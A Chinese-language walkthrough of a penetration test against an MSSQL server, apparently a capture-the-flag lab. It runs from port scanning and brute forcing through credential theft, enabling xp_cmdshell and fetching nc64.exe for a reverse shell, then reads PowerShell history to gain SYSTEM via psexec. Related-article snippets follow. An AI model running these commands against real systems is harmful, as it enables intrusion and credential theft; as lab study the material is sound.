MSSQL渗透测试

目录

    • mssql数据库连接
    • 提权至服务器权限

拿到目标的IP地址,我们先对IP地址进行信息收集,收集信息资产,同时使用nmap对IP地址进行扫描

nmap -sC -sV IP

在这里插入图片描述

从扫描的结果中,我们能知道目标服务器是windows操作系统,使用的是mssql数据库,数据库端口对外开放,我们先对1433端口进行爆破

hydra -L /root/user.txt -P /root/pass.txt ip mssql -vv

在这里插入图片描述

没有扫描出账号密码,看一下其它的端口有没有可以利用的地方

这个135端口是高危端口,我们去网上搜索一下相关利用资料,发现这个端口在之前涉及到一个冲击波病毒,这个端口有登录点,可以进行爆破,我这里使用NTscan进行爆破,没有跑出来

https://zhuanlan.zhihu.com/p/56059871

在这里插入图片描述

RPC协议提供DCOM服务,使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输

下面的两个139和445端口试了,也没有什么突破,我们看到1433端口,有用到smb协议,我们尝试一下

smbclient -N -L IP

在这里插入图片描述

查看smb文件成功,smb协议是一种网络通信协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。此外通过 SMB 协议,应用程序可以访问远程服务器端的文件、以及打印机等资源

我们这里是使用空口令进行登录并且查看smb文件,说明这个地方存在空口令漏洞

在这里插入图片描述

接下来,我们一个个查看smb文件,看看有没有什么敏感的信息泄露

smbclient \\\\IP\\查看的文件名

在这里插入图片描述

权限不够,加$的目录需要管理员权限,看来我们的账号有点不太行,看一下backups的
在这里插入图片描述

prod.dtsConfig好像是一个配置文件,我们把它下载下来看一下

get prod.dtsConfig

在这里插入图片描述

这个配置文件是MSSQL中SSIS的XML格式配置文件,里面应该会有我们想要的信息

在这里插入图片描述

在这里,我们找到了mssql数据库的账号密码,那我们现在就去连接目标的mssql服务器

mssql数据库连接

使用Impacket工具中的mssqlclient.py脚本去连接,进入/root/impacket/examples/目录,然后使用mssqlclient.py脚本去连接就可以了

python3 mssqlclient.py ARCHETYPE/sql_svc@IP -windows-auth

在这里插入图片描述

输入上面获得的密码,连接成功,获取

-windows-auth :使用 Windows 身份验证

我们接下来就是进行提权,我们需要判断sql_svc是不是管理员账号,权限够不够大

help

在这里插入图片描述

我们看到这里有xp_cmdshell功能,我们接着判断一下sql_svc是不是管理员账号

select is_srvrolemember('sysadmin');

在这里插入图片描述

返回1,说明是mssql的最高权限,sa,那我们就不需要提权了,我们试一下能不能执行命令

EXEC xp_cmdshell "net user";

在这里插入图片描述

返回error,说明xp_cmdshell功能不能使用,命令无法执行,我们使用以下命令组开启xp_cmdshell功能

EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE

在这里插入图片描述
在这里插入图片描述

xp_cmdshell "whoami"

在这里插入图片描述

确认命令能够执行,但是在数据库当中不好操作,所以我们接下来就要反弹shell
我们将上传nc.exe到目标服务器上,先开启HTTP服务器、nc侦听器

python3 -m http.server  80

在这里插入图片描述

nc -nvlp 1234

在这里插入图片描述

在目标数据库中查看当前目录

exec xp_cmdshell "powershell -c pwd";

在这里插入图片描述

路径在C:\Windows\system32,这个可不好操作,因为我们只是数据库的最高权限,是无法修改系统的目录,这个时候,我们要改变上传的目录,我进行了目录枚举,失败了,根本移动不了,从网上找了一个默认的上传目录
C:\Users\sql_svc\Downloads,切换到数据库的默认目录C:\Users\sql_svc\Downloads并下载我们本地的nc.exe

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://本地连接目标服务器的IP/nc64.exe -outfile nc64.exe"  

在这里插入图片描述
在这里插入图片描述

nc上传成功,nc反弹shell

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 本地连接目标服务器的IP 1234"

在这里插入图片描述
在这里插入图片描述

反弹shell成功,拿到目标数据库的权限

在这里插入图片描述

我们后续的命令在nc上面敲就好了,拿到数据库的权限,我们还要进一步提权,获取服务器的权限,以便于我们后续的信息收集

提权至服务器权限

在提权这里我使用的是winpeas,它可以帮我们寻找可以提权的方式
直接在nc界面输命令,先进入powershell界面

powershell

在这里插入图片描述

然后把winpeas.exe给下载进去

wget http://本地连接目标服务器的IP/winPEASx64.exe -outfile winpeas.exe

在这里插入图片描述
在这里插入图片描述

直接执行winpeas.exe这个工具就可以了,这个工具重点的东西,它会标红进行显示

.\winpeas.exe

在这里插入图片描述
在这里插入图片描述

看到这里,我知道这台服务器之前登录过两个账号,其中还有一个是管理员账号

ConsoleHost_history.txt是windows系统的powershell历史记录文件,我们去看看

cd AppData
cd Roaming\Microsoft\Windows\PowerShell\PSReadLine\
ls
type ConsoleHost_history.txt

在这里插入图片描述

我们直接看到了账号密码

winpeas不仅是一个提权的工具,它还能很好的收集服务器的信息,可以当作信息收集工具来使用,从它收集来的信息来看,这个目标没有内网

https://cloud.tencent.com/developer/article/2149150

在这里插入图片描述

我们得到了服务器管理员的账号密码,那我们现在就去连接一下,使用Impacket 套件中的psexec.py去连接

python3 psexec.py administrator@目标IP
whoami

在这里插入图片描述

成功获取服务器的system权限,因为没有内网就到这里了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/266648.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

金仕达与 DolphinDB 建立深度合作,共筑 FICC 科技创新新篇章

从“关起门做交易”到“打开门做服务”,国内 FICC 业务正经历从自营到市场化服务的转变,借助数据分析、算法交易等技术的快速发展,交易团队能够更加主动地发现市场需求,为不同客群提供更好的做市业务,FICC 交易电子化已…

奇安信发布《2024人工智能安全报告》,AI深度伪造欺诈激增30倍

2024年2月29日,奇安信集团对外发布《2024人工智能安全报告》(以下简称《报告》)。《报告》认为,人工智能技术的恶意使用将快速增长,在政治安全、网络安全、物理安全和军事安全等方面构成严重威胁。 《报告》揭示了基于…

电子科技大学课程《计算机网络系统》(持续更新)

前言 本校的课程课时有所缩减,因此可能出现与你学习的课程有所减少的情况,因此对其他学校的同学更多的作为参考作用。本文章适合学生的期中期末考试,以及想要考研电子科技大学的同学,电子科技大学同学请先看附言。 第一章 计算…

学习阶段单片机买esp32还是stm32?

学习阶段单片机买esp32还是stm32? 在开始前我有一些资料,是我根据网友给的问题精心整理了一份「stm32的资料从专业入门到高级教程」, 点个关注在评论区回复“888”之后私信回复“888”,全部无偿共享给大家!!&#xf…

FPGA-VGA成像原理与时序

什么是VGA: VGA, Video Graphics Array。即视频图形阵列,具有分辨率高、显示速率快、颜色丰富等优点。VGA接口不但是CRT显示设备的标准接口,同样也是LCD液晶显示设备的标准接口,具有广泛的应用范围。在FGPA中,常广泛用于图像处理等领域。 VGA 显示器成像原理 在 VGA 标准刚兴…

Java中的时间API:Date、Calendar到Java.time的演变

引言 在软件开发中,处理时间和日期是一项基本且不可或缺的任务。无论是日志记录、用户信息管理还是复杂的定时任务,准确地处理时间都显得至关重要。然而,时间的处理并不像它看起来那么简单,尤其是当我们考虑到时区、夏令时等因素…

递归算法题练习(数的计算、带备忘录的递归、计算函数值)

目录 递归的介绍 递归如何实现 递归和循环的比较 例题: (一、斐波那契数列,带备忘录的递归) 如果直接使用递归,难以算出结果,需要优化 优化方法:带备忘录的递归 (二、数的计算&#xff09…

Python+Selenium+Unittest 之Unittest1--简介

Unittest属于是一种单元测试框架,主要用于对代码中写好的单元内容进行验证,比如写好一个函数,可以使用unittest去进行验证该函数的代码逻辑是否有问题,对于自动化来说,可以去检验每条用例的内容是否符合预期。 Unittes…

ChatGPT在测试计划中的应用策略

测试计划是指描述了要进行的测试活动的范围、方法、资源和进度的文档。它主要包括测试项、被测特性、测试任务和风险控制等。 所以在使用ChatGPT输出结果之前,我们需要先将文档的内容框架梳理好,以及将内容范围划定好,必要的时候&#xff0c…

vue实现自定义树形穿梭框功能

需求: 我们在开发过程中,会遇到需要将一个数据选择做成穿梭框,但是要求穿梭框左侧为树形结构、右侧为无层级结构的数据展示,ElementUI自身无法在穿梭框中添加树形结构,网上搜到了大佬封装的插件但是对于右侧的无树形结…

Socket网络编程(一)——网络通信入门基本概念

目录 网络通信基本概念什么是网络?网络通信的基本架构什么是网络编程?7层网络模型-OSI模型什么是Socket?Socket的作用和组成Socket传输原理Socket与TCP、UDP的关系CS模型(Client-Server Application)报文段牛刀小试(TCP消息发送与接收&#…

vulnhub-----Hackademic靶机

文章目录 1.C段扫描2.端口扫描3.服务扫描4.web分析5.sql注入6.目录扫描7.写马php反弹shell木马 8.反弹shell9.内核提权 1.C段扫描 kali:192.168.9.27 靶机:192.168.9.25 ┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0,…

11.以太网交换机工作原理

目录 一、以太网协议二、以太网交换机原理三、交换机常见问题思考四、同网段数据通信全过程五、跨网段数据通信全过程六、关键知识七、调试命令 前言:在网络中传输数据时需要遵循一些标准,以太网协议定义了数据帧在以太网上的传输标准,了解以…

苹果iOS群控系统开发常见功能及其代码解析!

随着移动互联网的快速发展,iOS设备因其良好的用户体验和丰富的应用生态,受到了广大用户的喜爱,苹果iOS群控系统,即可以同时对多台iOS设备进行集中控制和管理的系统,逐渐成为了开发者、测试人员以及企业管理的有力工具。…

解析馆藏文物预防性保护:监测平台与数据传输系统概述

1)文物预防性保护监测平台概述 文物预防性保护监测与调控系统是文物环境监测必不可少的关键组成部分之一,在项目实施中,将充分利用前沿物联网技术,如无线网络、低功耗设计、高精度传感器来实现文物保存环境的实时监测与数据分析。此外,还将通…

php基础学习之错误处理(其二)

在实际应用中,开发者当然不希望把自己开发的程序的错误暴露给用户,一方面会动摇客户对己方的信心,另一方面容易被攻击者抓住漏洞实施攻击,同时开发者本身需要及时收集错误,因此需要合理的设置错误显示与记录错误日志 一…

SpringMVC 学习(七)之报文信息转换器 HttpMessageConverter

目录 1 HttpMessageConverter 介绍 2 RequestBody 注解 3 ResponseBody 注解 4 RequestEntity 5 ResponseEntity 6 RestController 注解 1 HttpMessageConverter 介绍 HttpMessageConverter 报文信息转换器,将请求报文(如JSON、XML、HTML等&#x…

android移动应用开发答案第二版,Kafka是如何实现高性能的

面试官:说说什么是 UI 线程? A:就是用来刷新 UI 所在的线程嘛 面试官:多说点 A:UI 是单线程刷新的,如果多个线程可以刷新 UI 就无所谓是不是 UI 线程了,单线程的好处是,UI 框架里…

一个Web3项目的收官之作,必然是友好的用户界面(Web3项目三实战之四)

正如标题所述,一个对用户体验友好的应用,总是会赢得用户大加赞赏,这是毋庸置疑的。 甭管是web2,亦或是已悄然而至的Web3,能有一个外观优美、用户体验效果佳的的界面,那么,这个应用无疑是个成功的案例。 诚然,Web3项目虽然核心是智能合约攥写,但用户界面也是一个DApp不…

程序员的金三银四求职宝典

随着春天的脚步渐近,对于许多程序员来说,一年中最繁忙、最重要的面试季节也随之而来。金三银四,即三月和四月,被广大程序员视为求职的黄金时期。在这两个月里,各大公司纷纷开放招聘,求职者们则通过一轮又一…